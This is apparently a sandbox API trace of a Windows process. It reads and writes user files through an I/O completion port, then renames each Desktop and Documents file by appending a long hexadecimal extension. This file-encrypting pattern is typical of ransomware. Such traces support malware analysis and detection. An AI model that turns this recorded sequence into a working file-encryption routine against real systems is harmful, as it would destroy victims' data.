[0123.583] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0123.583] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0123.595] WriteFile (in: hFile=0x324, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0123.596] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0123.714] ReadFile (in: hFile=0x324, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x3a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0123.714] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0123.715] WriteFile (in: hFile=0x324, lpBuffer=0x30e82d8, nNumberOfBytesToWrite=0x3a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 0x0 [0123.831] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0123.831] WriteFile (in: hFile=0x328, lpBuffer=0x33de348, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x33be210 | out: lpBuffer=0x33de348, lpNumberOfBytesWritten=0x0, lpOverlapped=0x33be210) returned 0x0 [0123.833] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0123.833] NtQueryObject (in: Handle=0x320, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x28fff70) returned 0x0 [0123.834] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\QrbWbLi_XDIVrlxB.jpg", lpString2=".92E14A0DF41EE283D9141DA0054BCBDD8848C963DA65D3C9F75688B524B2CC0A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\QrbWbLi_XDIVrlxB.jpg.92E14A0DF41EE283D9141DA0054BCBDD8848C963DA65D3C9F75688B524B2CC0A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\QrbWbLi_XDIVrlxB.jpg.92E14A0DF41EE283D9141DA0054BCBDD8848C963DA65D3C9F75688B524B2CC0A" [0123.834] GetProcessHeap () returned 0x600000 [0123.834] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x122) returned 0x6f67a0 [0123.834] NtSetInformationFile (FileHandle=0x320, IoStatusBlock=0x28fff60, FileInformation=0x6f67a0, Length=0x122, FileInformationClass=0xa) returned 0x0 [0123.839] CloseHandle (hObject=0x320) returned 1 [0123.840] GetProcessHeap () returned 0x600000 [0123.840] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0123.840] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0123.840] NtQueryObject (in: Handle=0x338, ObjectInformationClass=0x1, ObjectInformation=0x3396168, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x3396168, ReturnLength=0x28fff70) returned 0x0 [0123.840] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\B9KHvY6g7sdT.png", lpString2=".AA0B703D2AC72039058A05D3D9FA6A1C9222D91125031188AD5DB6D0E1CE354F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\B9KHvY6g7sdT.png.AA0B703D2AC72039058A05D3D9FA6A1C9222D91125031188AD5DB6D0E1CE354F") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\B9KHvY6g7sdT.png.AA0B703D2AC72039058A05D3D9FA6A1C9222D91125031188AD5DB6D0E1CE354F" [0123.840] GetProcessHeap () returned 0x600000 [0123.840] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x130) returned 0x6f6530 [0123.840] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x28fff60, FileInformation=0x6f6530, Length=0x130, FileInformationClass=0xa) returned 0x0 [0123.866] CloseHandle (hObject=0x338) returned 1 [0123.867] GetProcessHeap () returned 0x600000 [0123.867] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x33960b8 | out: hHeap=0x600000) returned 1 [0123.868] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0123.921] ReadFile (in: hFile=0x328, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0123.933] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0123.934] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0123.934] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\UHsb6Fmm9lo7HKFMD.flv", lpString2=".6DA78AF74E47DE9D08D2F9D32E1701D1E2F1FECBA886F5D900869012A849D501" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\UHsb6Fmm9lo7HKFMD.flv.6DA78AF74E47DE9D08D2F9D32E1701D1E2F1FECBA886F5D900869012A849D501") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\UHsb6Fmm9lo7HKFMD.flv.6DA78AF74E47DE9D08D2F9D32E1701D1E2F1FECBA886F5D900869012A849D501" [0123.934] GetProcessHeap () returned 0x600000 [0123.934] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x124) returned 0x3154030 [0123.934] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x28fff60, FileInformation=0x3154030, Length=0x124, FileInformationClass=0xa) returned 0x0 [0123.935] CloseHandle (hObject=0x32c) returned 1 [0123.936] GetProcessHeap () returned 0x600000 [0123.936] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0123.938] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0123.939] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x28fff70) returned 0x0 [0123.940] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\XKIyMoB.gif", lpString2=".08D1C747B2F5DCDB7DC7A830F0C08D4D21CCE3982DE3EE0752010B904BA8C15A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\XKIyMoB.gif.08D1C747B2F5DCDB7DC7A830F0C08D4D21CCE3982DE3EE0752010B904BA8C15A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Desktop\\XKIyMoB.gif.08D1C747B2F5DCDB7DC7A830F0C08D4D21CCE3982DE3EE0752010B904BA8C15A" [0123.940] GetProcessHeap () returned 0x600000 [0123.940] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x110) returned 0x6f1f98 [0123.940] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x28fff60, FileInformation=0x6f1f98, Length=0x110, FileInformationClass=0xa) returned 0x0 [0123.942] CloseHandle (hObject=0x328) returned 1 [0123.943] GetProcessHeap () returned 0x600000 [0123.943] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0123.944] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0123.954] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0123.955] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.041] ReadFile (in: hFile=0x32c, lpBuffer=0x690478, nNumberOfBytesToRead=0x2c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0124.041] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.044] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x28fff70) returned 0x0 [0124.044] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\4eP4pM2.pptx", lpString2=".64595A7D523F93DC0E89A238762225C4C1E8E99CC1958975CBECE3A69AEAB253" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\4eP4pM2.pptx.64595A7D523F93DC0E89A238762225C4C1E8E99CC1958975CBECE3A69AEAB253") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\4eP4pM2.pptx.64595A7D523F93DC0E89A238762225C4C1E8E99CC1958975CBECE3A69AEAB253" [0124.044] GetProcessHeap () returned 0x600000 [0124.044] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x116) returned 0x3368ac8 [0124.044] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x28fff60, FileInformation=0x3368ac8, Length=0x116, FileInformationClass=0xa) returned 0x0 [0124.046] CloseHandle (hObject=0x32c) returned 1 [0124.046] GetProcessHeap () returned 0x600000 [0124.046] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0124.047] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.059] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.060] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.085] NtQueryObject (in: Handle=0x33c, ObjectInformationClass=0x1, ObjectInformation=0x336e010, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x336e010, ReturnLength=0x28fff70) returned 0x0 [0124.085] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\mlxdYvvdE5S6wZOP0yPo.doc", lpString2=".B719DE5E8C48AD6227682B7250822D675212A56DCBC81D84553CA8359AE2A31F" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\mlxdYvvdE5S6wZOP0yPo.doc.B719DE5E8C48AD6227682B7250822D675212A56DCBC81D84553CA8359AE2A31F") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\mlxdYvvdE5S6wZOP0yPo.doc.B719DE5E8C48AD6227682B7250822D675212A56DCBC81D84553CA8359AE2A31F" [0124.085] GetProcessHeap () returned 0x600000 [0124.085] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x176) returned 0x6d6120 [0124.086] NtSetInformationFile (FileHandle=0x33c, IoStatusBlock=0x28fff60, FileInformation=0x6d6120, Length=0x176, FileInformationClass=0xa) returned 0x0 [0124.087] CloseHandle (hObject=0x33c) returned 1 [0124.088] GetProcessHeap () returned 0x600000 [0124.088] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336df60 | out: hHeap=0x600000) returned 1 [0124.088] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.093] WriteFile (in: hFile=0x33c, lpBuffer=0x338e098*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60) returned 1 [0124.094] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.109] NtQueryObject (in: Handle=0x33c, ObjectInformationClass=0x1, ObjectInformation=0x336e010, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x336e010, ReturnLength=0x28fff70) returned 0x0 [0124.109] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\UsMBTgT.doc", lpString2=".F7B82A1F5E29948EA8D37E2D64E60E9131047D62922090A67FADBDD1F282AE51" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\UsMBTgT.doc.F7B82A1F5E29948EA8D37E2D64E60E9131047D62922090A67FADBDD1F282AE51") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\UsMBTgT.doc.F7B82A1F5E29948EA8D37E2D64E60E9131047D62922090A67FADBDD1F282AE51" [0124.109] GetProcessHeap () returned 0x600000 [0124.109] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x15c) returned 0x336a300 [0124.109] NtSetInformationFile (FileHandle=0x33c, IoStatusBlock=0x28fff60, FileInformation=0x336a300, Length=0x15c, FileInformationClass=0xa) returned 0x0 [0124.111] CloseHandle (hObject=0x33c) returned 1 [0124.111] GetProcessHeap () returned 0x600000 [0124.111] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336df60 | out: hHeap=0x600000) returned 1 [0124.111] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.115] ReadFile (in: hFile=0x33c, lpBuffer=0x338e098, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60) returned 1 [0124.115] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.116] NtQueryObject (in: Handle=0x33c, ObjectInformationClass=0x1, ObjectInformation=0x336e010, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x336e010, ReturnLength=0x28fff70) returned 0x0 [0124.116] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\xVP2P6AqYDoz.ppt", lpString2=".A6C2640AF322180B4573447E112BC796AAB5A44110F85A33955337FBA6A86408" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\xVP2P6AqYDoz.ppt.A6C2640AF322180B4573447E112BC796AAB5A44110F85A33955337FBA6A86408") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\xVP2P6AqYDoz.ppt.A6C2640AF322180B4573447E112BC796AAB5A44110F85A33955337FBA6A86408" [0124.116] GetProcessHeap () returned 0x600000 [0124.116] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x166) returned 0x315e918 [0124.116] NtSetInformationFile (FileHandle=0x33c, IoStatusBlock=0x28fff60, FileInformation=0x315e918, Length=0x166, FileInformationClass=0xa) returned 0x0 [0124.117] CloseHandle (hObject=0x33c) returned 1 [0124.118] GetProcessHeap () returned 0x600000 [0124.118] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336df60 | out: hHeap=0x600000) returned 1 [0124.118] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.124] WriteFile (in: hFile=0x31c, lpBuffer=0x338e098*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x336df60) returned 1 [0124.125] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.164] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x33400b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x33400b8, ReturnLength=0x28fff70) returned 0x0 [0124.165] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\A4rlSjgAia3c.csv", lpString2=".EE092AFAB2989A8D5D81F945D63A51AE91B72C9DF10D7D850ECAC32C5E887F7C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\A4rlSjgAia3c.csv.EE092AFAB2989A8D5D81F945D63A51AE91B72C9DF10D7D850ECAC32C5E887F7C") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\4v07jmXO0a\\A4rlSjgAia3c.csv.EE092AFAB2989A8D5D81F945D63A51AE91B72C9DF10D7D850ECAC32C5E887F7C" [0124.165] GetProcessHeap () returned 0x600000 [0124.165] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x166) returned 0x315e338 [0124.165] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x28fff60, FileInformation=0x315e338, Length=0x166, FileInformationClass=0xa) returned 0x0 [0124.167] CloseHandle (hObject=0x334) returned 1 [0124.168] GetProcessHeap () returned 0x600000 [0124.168] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3340008 | out: hHeap=0x600000) returned 1 [0124.168] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.170] ReadFile (in: hFile=0x31c, lpBuffer=0x338e098, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60) returned 1 [0124.171] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.171] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x336e010, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x336e010, ReturnLength=0x28fff70) returned 0x0 [0124.172] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\71nL LIFl3JmMfQUnT1-.ods", lpString2=".1EC46679B1FCFDD9EE97B2A9215E5C46B4C486F9DB5329978923406A7C6B0F6D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\71nL LIFl3JmMfQUnT1-.ods.1EC46679B1FCFDD9EE97B2A9215E5C46B4C486F9DB5329978923406A7C6B0F6D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Documents\\6D2j8wRsZ4UySx4Ge\\K68ZIV\\71nL LIFl3JmMfQUnT1-.ods.1EC46679B1FCFDD9EE97B2A9215E5C46B4C486F9DB5329978923406A7C6B0F6D" [0124.172] GetProcessHeap () returned 0x600000 [0124.172] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x160) returned 0x336a8a0 [0124.172] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x28fff60, FileInformation=0x336a8a0, Length=0x160, FileInformationClass=0xa) returned 0x0 [0124.173] CloseHandle (hObject=0x31c) returned 1 [0124.174] GetProcessHeap () returned 0x600000 [0124.174] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336df60 | out: hHeap=0x600000) returned 1 [0124.176] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.182] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0124.182] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.290] ReadFile (in: hFile=0x328, lpBuffer=0x690478, nNumberOfBytesToRead=0x2c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0124.290] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.296] ReadFile (in: hFile=0x328, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0124.296] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.305] ReadFile (in: hFile=0x328, lpBuffer=0x690478, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 0x0 [0124.309] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.312] ReadFile (in: hFile=0x328, lpBuffer=0x690478, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340 | out: lpBuffer=0x690478*, lpNumberOfBytesRead=0x0, lpOverlapped=0x670340) returned 1 [0124.312] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0124.321] 